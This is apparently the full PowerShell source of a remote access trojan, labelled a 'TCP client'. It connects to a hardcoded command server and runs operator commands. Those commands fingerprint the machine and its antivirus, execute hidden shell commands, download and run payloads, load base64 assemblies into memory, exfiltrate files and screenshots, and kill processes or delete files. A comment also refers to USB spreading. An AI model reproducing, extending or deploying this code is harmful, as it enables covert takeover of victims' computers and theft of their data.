                #=============================================================
                #==================  The PowerShell-Client TCP  ==============
                #========= Development of script programming : Mr3 ===========
                #======================== Tcp Socket =========================
                #=============================================================

#================The beginning of the script=====================================
 
#var
$spl = "<>"
$vn = "Guest"
$sp= "&&&"
$hostname = "192.168.4.11"
$port = "8082"
$Path = $env:temp + "\"

#Get name of current script
$ScriptName = $MyInvocation.MyCommand.Name
$fullPathIncFileName = $MyInvocation.MyCommand.Definition
#========================="*-]NK[-*"====================================
# object com
$WshShell = New-Object -comObject WScript.Shell
$Sh = New-Object -comObject Shell.Application
$Fs = New-Object -comObject Scripting.FileSystemObject
#==================================================================


# Function get information
function info { 

    $mch = [environment]::Machinename
    $usr = [environment]::username
    $SerialNumber = $Fs.GetDrive("c:\").SerialNumber
    $SerialNumber = "{0:X}" -f $SerialNumber
    $HWD = $SerialNumber
    
    $wi = (Get-WmiObject Win32_OperatingSystem).Caption
    $wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
    $wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86').replace('?','e');
    $av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
    $nanav =""
    if ($av -eq $null) 
    {$av = 'nan-av'}
    $e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';
    if (test-path $e) 
    {$nt = '.Net YES'} 
    else 
    {$nt= '.Net NO'};
     if (test-path 'HKCU:\vdw0rm')
     {$usb = 'TRUE'} else { $usb = 'FALSE'};
    $u = 'PC' + $spl + $vn + '_' + $HWD+ $spl + $usr + $spl + $mch + $spl + $wi + $spl + $av + $spl + $nt + $spl + $usb + $spl + $sp;
     return $u
     
 }
# Function Spread -shortcut-usb 
#============================================================= 
# Function Kills CURRENT instance if this script already running. 

#=====================Create Soket Connect========================================
try
{
$Client = New-Object -TypeName System.Net.Sockets.TcpClient
$Client.Connect($hostname, $port)
$tcpStream = $Client.GetStream()
}
catch
{
    
    $_.Exception.Message
}
#============================ functions controler =================================
Function getdriver{
 $fso = New-Object -Com "Scripting.FileSystemObject"
    foreach ($driv in $fso.drives ){
     if ($driv.isready -eq  $true  ){
        $drv = $drv + $driv.path + "|" 
     }
    
     }
return $drv
}
#=============================================================
Function getfolder($dir) {
$fso = New-Object -Com "Scripting.FileSystemObject"
$fil = $dir + '<|>'
foreach ($folder in $fso.getfolder($dir).subfolders){
     $fil = $fil + $folder.name + "|" + "" + "|" + "Folder" + "|" + '<|>'
}

foreach ($file in $fso.getfolder($dir).files){
     $fil = $fil + $file.name + "|" + $file.size  + "|" + "File" + "|" + '<|>'

}
return $fil
}
#=============================================================
Function process-m{ 
$ProcRunning = get-wmiobject win32_process 
foreach ($process in $ProcRunning)
{
$proces = $proces + $process.processname + "|" + $process.ProcessId + "|" + $process.executablepath + '<|>'
}
return $proces
}

#===========================================================================================

function CMDOS($cmd){
    $WshShell.run("cmd /c " + $cmd + " > " + $Path + "outs.txt & exit",0)
    Start-Sleep -s 1
    $text = [IO.File]::ReadAllText($env:temp + "\outs.txt",[System.Text.Encoding]::Default) 
    Remove-Item $env:temp + "\outs.txt"
    return $text
}

#=================# [User32]::MessageBox(0,$drv,"Mr3amo",0) ===================================
# Main script

while($true) {

        

 if ($Client.Connected){
         if ($tcpStream.CanRead -And $Client.Available -ge 0 ){
                    
                 #Set the receive buffer size to 16k  16384
                 $buffer = New-Object -TypeName System.Byte[] $Client.ReceiveBufferSize
                 $read = $tcpStream.Read($buffer, 0, $Client.ReceiveBufferSize)
                 $PP += [System.Text.Encoding]::Default.GetString($buffer, 0,$read)
                    
                    [System.Threading.Thread]::Sleep(10) 
                  #=== To make sure the package is finished =====
                   If ($PP.Contains($sp)){
                    
                      $T = $PP.split($spl)
                 
                      $PP =$null
                   }
                   
                   #==============================================
         
                  # send info data
                 if ($T[0] -eq 'pc') {
                     
                     $message = info
                   
                     $data = [System.Text.Encoding]::Default.GetBytes($message)
                     $tcpStream.Write($data, 0, $data.Length)
                     $message = $null 
                  }
                 # close client 
                 if ($T[0] -eq 'cl') {
                 
                     exit
                  
                  }
                  
                 # reconnect client
                 if ($T[0] -eq 'dis') {
                   
                     $tcpStream.Dispose()
                     $Client.Close()
                        
                  } 
                  
                   # Load to memory                
                 if ($T[0] -eq 'Mem') {
				 
					 [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring($T[2]))).EntryPoint.invoke($null,$null)

                 } 
                 # downlader 
                 if ($T[0] -eq 'Dow') {
                   
                     $wc = New-Object System.Net.WebClient
                     $wc.DownloadFile($T[2], $Path + $T[4] )
                     [System.Diagnostics.Process]::Start($Path + $T[4]) 

                 }
                 # open process manager & send data
                 if ($T[0] -eq 'opr'){
                
                     $proc = process-m
                   
                     $data = [System.Text.Encoding]::ASCII.GetBytes('opr'+ $spl + $proc + $sp)
                     $tcpStream.Write($data, 0, $data.Length)
                     $proc = $null
                    
                  }
                  #send data process manager
                  if ($T[0] -eq 'prc'){
                
                     $proc = process-m
                   
                     $data = [System.Text.Encoding]::ASCII.GetBytes('process'+ $spl + $proc + $sp)
                     $tcpStream.Write($data, 0, $data.Length)
                     $proc = $null
                    
                  }
                  # stop or kill process 
                  if ($T[0] -eq 'kpr') {
                  
       
                     stop-process -id $T[2]
                   
                  }
                  # open cmd
                  if ($T[0] -eq 'cmd'){
                
                  
                    $data = [System.Text.Encoding]::ASCII.GetBytes('cmd'+ $spl + $sp)
                    $tcpStream.Write($data, 0, $data.Length)
                    
                  }
                  # send data cmd
                  if ($T[0] -eq 'sh'){

                     $text = CMDOS($T[2])
                     $data = [System.Text.Encoding]::ASCII.GetBytes('sh'+ $spl + $text + $sp)
                     $tcpStream.Write($data, 0, $data.Length)
                     $text = $null
                  }
                   # open file manager               
                  if ($T[0] -eq 'frm') {
                     $data = [System.Text.Encoding]::ASCII.GetBytes('frm'+ $spl + $sp)
                     $tcpStream.Write($data, 0, $data.Length)
       
                  }
                  # get driver & send data file manager
                  if ($T[0] -eq 'drv') {
                     $drv = getdriver($T[2])
                    
                     $data = [System.Text.Encoding]::ASCII.GetBytes('drv' + $spl + $drv + $spl + $sp)
                     $tcpStream.Write($data, 0, $data.Length)
                    
                     $drv=$null 
                   
                  }
                  # get folder & send data file manager
                  if ($T[0] -eq 'fld') {
                      $fld = getfolder($T[2])
                   
                     $data = [System.Text.Encoding]::ASCII.GetBytes('fld'+ $spl + $fld + $spl + $sp)
                     $tcpStream.Write($data, 0, $data.Length) 
                     $fld = $null
                  }
                  
                  # download file & send data file manager
                  if ($T[0] -eq 'dwn') {
                     
                     $content =[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes($T[2]))
                     $data = [System.Text.Encoding]::ASCII.GetBytes('dwn'+ $spl + $content + $spl + $sp)
                     $tcpStream.Write($data, 0, $data.Length)
       
                  }
                  
                  # Run a file /// file manager
                  if ($T[0] -eq 'run') {
                  
                    [Diagnostics.Process]::Start($T[2])
                    
          
                  }
                  
                  # upload a file /// file manager
                  if ($T[0] -eq 'up') {
                  
                    [System.IO.File]::WriteAllBytes($T[2], [Convert]::Frombase64String($T[4]))
                    $data = [System.Text.Encoding]::ASCII.GetBytes('uF'+ $spl + $sp)
                    $tcpStream.Write($data, 0, $data.Length)
                   
                  }
                  # send open screenshot
                  if ($T[0] -eq 'ocp') {
                  
                    $data = [System.Text.Encoding]::ASCII.GetBytes('ocp'+ $spl + $sp)
                    $tcpStream.Write($data, 0, $data.Length)
                  
                  }
                  
                  #  capture screenshot + send data
                  if ($T[0] -eq 'cap') {
                  
                    Add-Type -AssemblyName System.Windows.Forms
                    Add-type -AssemblyName System.Drawing
                    # Gather Screen resolution information
                    $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
                    $Width = $Screen.Width
                    $Height = $Screen.Height
                    $Left = $Screen.Left
                    $Top = $Screen.Top
                    # Create bitmap using the top-left and bottom-right bounds
                    $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
                    # Create Graphics object
                    $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
                    # Capture screen
                    $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
                    # $converter = New-Object -TypeName System.Drawing.ImageConverter
                     #[byte[]]$byt = $converter.ConvertTo($bitmap, [byte[]])
                     #$T = [System.Convert]::ToBase64String($byt)

                    # [User32]::MessageBox(0,$T,"Mr3amo",0)
                    # Save to file
                    $bitmap.Save($Path + "g_h3n.tmp")
                     
                    $jpg =[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes($Path + "g_h3n.tmp"))
                    $data = [System.Text.Encoding]::ASCII.GetBytes('cap'+ $spl + $jpg + $spl + $sp)
                    $tcpStream.Write($data, 0, $data.Length)
                    Remove-Item $Path + "g_h3n.tmp"
                    
                  }
                  
                  # uninstall Client
                  if ($T[0] -eq 'uns') {
                  
                   
                   
                   $tcpStream.Dispose()
                   
                   $Client.Close()
                   
                   
                 
                  
                   exit
                  
                  }
                  
                  # open frm to upload a file /// from disk
                  if ($T[0] -eq 'u1') {
                    $data = [System.Text.Encoding]::ASCII.GetBytes('u1'+ $spl + $sp)
                    $tcpStream.Write($data, 0, $data.Length)
                  
                  }
                  # upload a file
                  if ($T[0] -eq 'up1') {
                 
                  [System.IO.File]::WriteAllBytes($Path + $T[2], [Convert]::Frombase64String($T[4]))
                  [System.Diagnostics.Process]::Start($Path + $T[2]) 
                  $data = [System.Text.Encoding]::ASCII.GetBytes('uF1'+ $spl + $sp)
                   $tcpStream.Write($data, 0, $data.Length)
                  
                  }
                  
                  # Rename file
                  if ($T[0] -eq 'rnf') {
                  
                  Rename-Item $T[2] $T[4]
                  }
                  
                  # Remove file
                  if ($T[0] -eq 'df') {
                  
                  Remove-Item $T[2]
                  }
                  
                   
      
         }else {
        $tcpStream.Dispose()
        $Client.Close()
        $Client = New-Object System.Net.Sockets.TcpClient($hostname,$port)
        $tcpStream = $Client.GetStream()
       $PP =$null
        $T = $null
         }
 
 
  }else {
    $tcpStream.Dispose()
    $Client.Close()
    $Client = New-Object System.Net.Sockets.TcpClient($hostname,$port)
    $tcpStream = $Client.GetStream()
   $PP =$null
    $T = $null
 }


#Start-Sleep -s 2

 }

# End of script


